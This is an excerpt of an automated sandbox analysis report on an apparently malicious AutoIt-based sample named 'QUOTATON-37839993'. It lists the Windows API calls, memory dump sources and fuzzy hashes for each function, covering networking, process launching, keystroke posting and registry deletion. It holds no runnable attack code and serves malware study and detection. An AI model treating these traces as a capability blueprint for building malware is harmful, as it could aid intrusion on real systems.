                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 3648134473-3128320259
                                                                      • Opcode ID: 3f789566a116ff4757182abfbdaabd9e0af036ff524130af4e2f54332771ab10
                                                                      • Instruction ID: 1bc15971d7786742e83483f7712fb7181ccfef8fb03040fb8fd7ec370c84e4d1
                                                                      • Opcode Fuzzy Hash: 3f789566a116ff4757182abfbdaabd9e0af036ff524130af4e2f54332771ab10
                                                                      • Instruction Fuzzy Hash: C90162F2940208BFE711A7A1DD89EFB776CEB08300F0005A1F749F2151EA749E894B70
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00E8D47C
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00E8D49C
                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E8D6D7
                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E8D6F5
                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E8D716
                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00E8D735
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E8D75A
                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E8D77D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      • Opcode ID: 9c78382b0dc236520007a43add7f77e9afc3bdde62e5e881e187bd86788f0ed0
                                                                      • Instruction ID: bf24ed9281eeffc5b694d643eb9fcaf18493817df72b4ce0e900cf045bce22e0
                                                                      • Opcode Fuzzy Hash: 9c78382b0dc236520007a43add7f77e9afc3bdde62e5e881e187bd86788f0ed0
                                                                      • Instruction Fuzzy Hash: 0DB1BC31604219EFDF18DF69C985BAD7BB1FF04705F08906AEC4CAB295E731A990DB90
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000), ref: 00E02ACF
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00E02B17
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000), ref: 00E3C21A
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000), ref: 00E3C286
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: d9a17bc1bb242dfbda51f3ac58145bfad5670c768e107bd1f08316ad0cc8a5b8
                                                                      • Instruction ID: a0b2c1780fca89948ee272e7c6810a60e97d898c36f463318c4a6e8b1ded05a7
                                                                      • Opcode Fuzzy Hash: d9a17bc1bb242dfbda51f3ac58145bfad5670c768e107bd1f08316ad0cc8a5b8
                                                                      • Instruction Fuzzy Hash: B7410C317046809EDB359B298C8CBAB7FF1AB45318F24A81DE247B65F1CA75E8C5D720
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E670DD
                                                                        • Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
                                                                        • Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E67114
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00E67130
                                                                      • _memmove.LIBCMT ref: 00E6717E
                                                                      • _memmove.LIBCMT ref: 00E6719B
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E671AA
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E671BF
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E671DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 256516436-0
                                                                      • Opcode ID: 6d88c77c4d0671be5dfeffcda00d93a84e9f29a4624201e9cc5defc34ef3105b
                                                                      • Instruction ID: bb5cfbaa96c79f0d314734a612fb0760ad8589a6ee7ef1f56ff2cc5922c8e91b
                                                                      • Opcode Fuzzy Hash: 6d88c77c4d0671be5dfeffcda00d93a84e9f29a4624201e9cc5defc34ef3105b
                                                                      • Instruction Fuzzy Hash: 2A316D31900215EFCF00DFA5EC85AAFB7B8EF45710F1541A5E904BB296DB309E54CBA0
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00E861EB
                                                                      • GetDC.USER32(00000000), ref: 00E861F3
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E861FE
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00E8620A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E86246
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E86257
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E8902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00E86291
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E862B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: e8122b1d5dc78226dd29ab5e4b699d8145b65da38832dd0018d0574ef3cd8cda
                                                                      • Instruction ID: 72e7a0084bc49c00c9ef710449ae8efbc6b63d9b6f3664fb4b07ad7466e2598c
                                                                      • Opcode Fuzzy Hash: e8122b1d5dc78226dd29ab5e4b699d8145b65da38832dd0018d0574ef3cd8cda
                                                                      • Instruction Fuzzy Hash: E1317F72101210BFEB119F51CC8AFEA3BADEF49765F0441A5FE0CAA1A2D6759C41CBA4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 34b7a74105c44dfd9a2c30d668714be8e69cc167eba75b75a05f534091648057
                                                                      • Instruction ID: 6c73f52ab9528fda2a44051d531bad98fa0dcbea73af6c8d19268bbbc2cd47b3
                                                                      • Opcode Fuzzy Hash: 34b7a74105c44dfd9a2c30d668714be8e69cc167eba75b75a05f534091648057
                                                                      • Instruction Fuzzy Hash: 7F21F6616013197BEA047621AD42FFFB39C9E2034DF087824FE08B6647EB64DF19C1A5
                                                                      APIs
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                        • Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9
                                                                      • _wcstok.LIBCMT ref: 00E6EC94
                                                                      • _wcscpy.LIBCMT ref: 00E6ED23
                                                                      • _memset.LIBCMT ref: 00E6ED56
                                                                      Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E76C00
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E76C21
• WSAGetLastError.WSOCK32(00000000), ref: 00E76C34
• htons.WSOCK32(?,?,?,00000000,?), ref: 00E76CEA
• inet_ntoa.WSOCK32(?), ref: 00E76CA7
  • Part of subcall function 00E5A7E9: _strlen.LIBCMT ref: 00E5A7F3
  • Part of subcall function 00E5A7E9: _memmove.LIBCMT ref: 00E5A815
• _strlen.LIBCMT ref: 00E76D44
• _memmove.LIBCMT ref: 00E76DAD
Similarity
• API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
• String ID:
• API String ID: 3619996494-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• IsWindow.USER32(01014DD0), ref: 00E8B3EB
• IsWindowEnabled.USER32(01014DD0), ref: 00E8B3F7
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E8B4DB
• SendMessageW.USER32(01014DD0,000000B0,?,?), ref: 00E8B512
• IsDlgButtonChecked.USER32(?,?), ref: 00E8B54F
• GetWindowLongW.USER32(01014DD0,000000EC), ref: 00E8B571
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E8B589
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
APIs
• _memset.LIBCMT ref: 00E7F448
• _memset.LIBCMT ref: 00E7F511
• ShellExecuteExW.SHELL32(?), ref: 00E7F556
  • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
  • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
  • Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9
• GetProcessId.KERNEL32(00000000), ref: 00E7F5CD
• CloseHandle.KERNEL32(00000000), ref: 00E7F5FC
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
APIs
• GetParent.USER32(?), ref: 00E60F8C
• GetKeyboardState.USER32(?), ref: 00E60FA1
• SetKeyboardState.USER32(?), ref: 00E61002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00E61030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00E6104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00E61095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E610B8
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(00000000), ref: 00E60DA5
• GetKeyboardState.USER32(?), ref: 00E60DBA
• SetKeyboardState.USER32(?), ref: 00E60E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E60E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E60E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E60EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E60EC9
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E5D5D4
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E5D60A
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E5D61B
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E5D69D
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: ,,$DllGetClassObject
• API String ID: 753597075-2867008933
APIs
  • Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E63697,?), ref: 00E6468B
  • Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E63697,?), ref: 00E646A4
• lstrcmpiW.KERNEL32(?,?), ref: 00E636B7
• _wcscmp.LIBCMT ref: 00E636D3
• MoveFileW.KERNEL32(?,?), ref: 00E636EB
• _wcscat.LIBCMT ref: 00E63733
• SHFileOperationW.SHELL32(?), ref: 00E6379F
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
APIs
• _memset.LIBCMT ref: 00E872AA
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E87351
• IsMenu.USER32(?), ref: 00E87369
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E873B1
• DrawMenuBar.USER32 ref: 00E873C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                      • String ID: 0
                                                                      • API String ID: 3866635326-4108050209
                                                                      • Opcode ID: 980566f54ac2f54e4d5d00cf4a990a91c948beea3979c22e4f2a2141390792be
                                                                      • Instruction ID: 6392baf952ab528ed3461b8a796deb656bba78f470282d489a7cdf6d70d48c12
                                                                      • Opcode Fuzzy Hash: 980566f54ac2f54e4d5d00cf4a990a91c948beea3979c22e4f2a2141390792be
                                                                      • Instruction Fuzzy Hash: 40412675A04208AFDB20EF50D884E9ABBF8FB04314F24A529FD99A7260D731ED54EB51
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E80FD4
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E80FFE
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00E810B5
                                                                        • Part of subcall function 00E80FA5: RegCloseKey.ADVAPI32(?), ref: 00E8101B
                                                                        • Part of subcall function 00E80FA5: FreeLibrary.KERNEL32(?), ref: 00E8106D
                                                                        • Part of subcall function 00E80FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E81090
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E81058
                                                                      Similarity
                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 395352322-0
                                                                      • Opcode ID: 88d9e81b635c9d3f376e5d08d2cbe19c4f80fb4c7fa9784e5e6d49559ed9f706
                                                                      • Instruction ID: d346e3bf18a8a4451b2024f8927e53f793484d2b0a2069af09f9d971c3adb1ec
                                                                      • Opcode Fuzzy Hash: 88d9e81b635c9d3f376e5d08d2cbe19c4f80fb4c7fa9784e5e6d49559ed9f706
                                                                      • Instruction Fuzzy Hash: 98311C71901109BFDB15AB90DC89AFFB7BCEF08304F1001A9E509F2141EA749E8A9BA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E862EC
                                                                      • GetWindowLongW.USER32(01014DD0,000000F0), ref: 00E8631F
                                                                      • GetWindowLongW.USER32(01014DD0,000000F0), ref: 00E86354
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E86386
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E863B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E863C1
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E863DB
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: 3e0dc32e414f3b47dd8f94af5c27cc2ae0a50ea501c99aeee88c100d0265901c
                                                                      • Instruction ID: a95cfacd970d2082239a09760f0c4252a35013321eec75828c038b7ca539ce4a
                                                                      • Opcode Fuzzy Hash: 3e0dc32e414f3b47dd8f94af5c27cc2ae0a50ea501c99aeee88c100d0265901c
                                                                      • Instruction Fuzzy Hash: 353134326002509FDB21DF1ADC84F5537E1FB8A718F1811B4F508EF2B1CB72A8849B90
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DB2E
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DB54
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00E5DB57
                                                                      • SysAllocString.OLEAUT32(?), ref: 00E5DB75
                                                                      • SysFreeString.OLEAUT32(?), ref: 00E5DB7E
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E5DBA3
                                                                      • SysAllocString.OLEAUT32(?), ref: 00E5DBB1
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 2f4413d8e0e00343a14bede3feedfee4738b61c8084280fe47d745fbf5aa6f80
                                                                      • Instruction ID: de8b6b66b3aab4dd3b1332be475bac2ef7be4b3276d2c405b5900da85937ed33
                                                                      • Opcode Fuzzy Hash: 2f4413d8e0e00343a14bede3feedfee4738b61c8084280fe47d745fbf5aa6f80
                                                                      • Instruction Fuzzy Hash: DF21C736604219AFDF60DFA9DC88CBB73EDEB08365B118525FD18EB251D670DC498760
                                                                      APIs
                                                                        • Part of subcall function 00E77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E77DB6
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E761C6
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E761D5
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E7620E
                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00E76217
                                                                      • WSAGetLastError.WSOCK32 ref: 00E76221
                                                                      • closesocket.WSOCK32(00000000), ref: 00E7624A
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E76263
                                                                      Similarity
                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 910771015-0
                                                                      • Opcode ID: 4655276be9453771ede475a9d0d826cd3172de1cbbb3a8b8a215ed8c2b829b40
                                                                      • Instruction ID: 87399a7529aad41b02455b011a2c66d56cdfd573726c95984b0413720575a0f7
                                                                      • Opcode Fuzzy Hash: 4655276be9453771ede475a9d0d826cd3172de1cbbb3a8b8a215ed8c2b829b40
                                                                      • Instruction Fuzzy Hash: 6E31A471600514AFDF14AF64CC85BBD7BA8EB45718F048069FD09B7292DB70AC449B61
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 1038674560-2734436370
                                                                      • Opcode ID: 88a9f87bc911077821e51ec83e0cd1d818c3ef10fd06cfbc99f04bc3e701b57b
                                                                      • Instruction ID: afa117517d7cd74d9ad686d3df20a6f8088fa220eac7d0cc7846153370878736
                                                                      • Opcode Fuzzy Hash: 88a9f87bc911077821e51ec83e0cd1d818c3ef10fd06cfbc99f04bc3e701b57b
                                                                      • Instruction Fuzzy Hash: C12149722142217ADA20AA34AC02FE773DCEF59345F10683AFD46B7091EB909D89C2D5
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DC09
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5DC2F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00E5DC32
                                                                      • SysAllocString.OLEAUT32 ref: 00E5DC53
                                                                      • SysFreeString.OLEAUT32 ref: 00E5DC5C
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E5DC76
                                                                      • SysAllocString.OLEAUT32(?), ref: 00E5DC84
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 2398062d546208c73049feb666d8b4efc24097866918341107e30270c7083340
                                                                      • Instruction ID: 2912299aec77b4c6d25d6bc6d225956202435b8d11e1594f77dba32f7c887198
                                                                      • Opcode Fuzzy Hash: 2398062d546208c73049feb666d8b4efc24097866918341107e30270c7083340
                                                                      • Instruction Fuzzy Hash: 48219835608204AFDB20DFB9DC88DABB7ECEB08361B118565FD15EB2A1D670DC49C764
                                                                      APIs
                                                                        • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                                                                        • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                                                                        • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E87632
                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E8763F
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E8764A
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E87659
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E87665
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      • Opcode ID: 689bbf79159b66119f4f761d6b659a864c87df1e75a452ea6190ff04fa3706c1
                                                                      • Instruction ID: 4b92f18f54b796829f237464315f4e6d2404235e7469566e9401c89265a46430
                                                                      • Opcode Fuzzy Hash: 689bbf79159b66119f4f761d6b659a864c87df1e75a452ea6190ff04fa3706c1
                                                                      • Instruction Fuzzy Hash: 5211D3B2110219BFEF109F64CC85EE77F5DEF08398F115115B648B20A0D6729C21DBA4
                                                                      APIs
                                                                      • __init_pointers.LIBCMT ref: 00E29AE6
                                                                        • Part of subcall function 00E23187: EncodePointer.KERNEL32(00000000), ref: 00E2318A
                                                                        • Part of subcall function 00E23187: __initp_misc_winsig.LIBCMT ref: 00E231A5
                                                                        • Part of subcall function 00E23187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E29EA0
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E29EB4
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E29EC7
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E29EDA
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E29EED
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E29F00
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E29F13
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E29F26
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E29F39
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E29F4C
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E29F5F
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E29F72
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E29F85
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E29F98
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E29FAB
                                                                        • Part of subcall function 00E23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E29FBE
                                                                      • __mtinitlocks.LIBCMT ref: 00E29AEB
                                                                      • __mtterm.LIBCMT ref: 00E29AF4
                                                                        • Part of subcall function 00E29B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E29AF9,00E27CD0,00EBA0B8,00000014), ref: 00E29C56
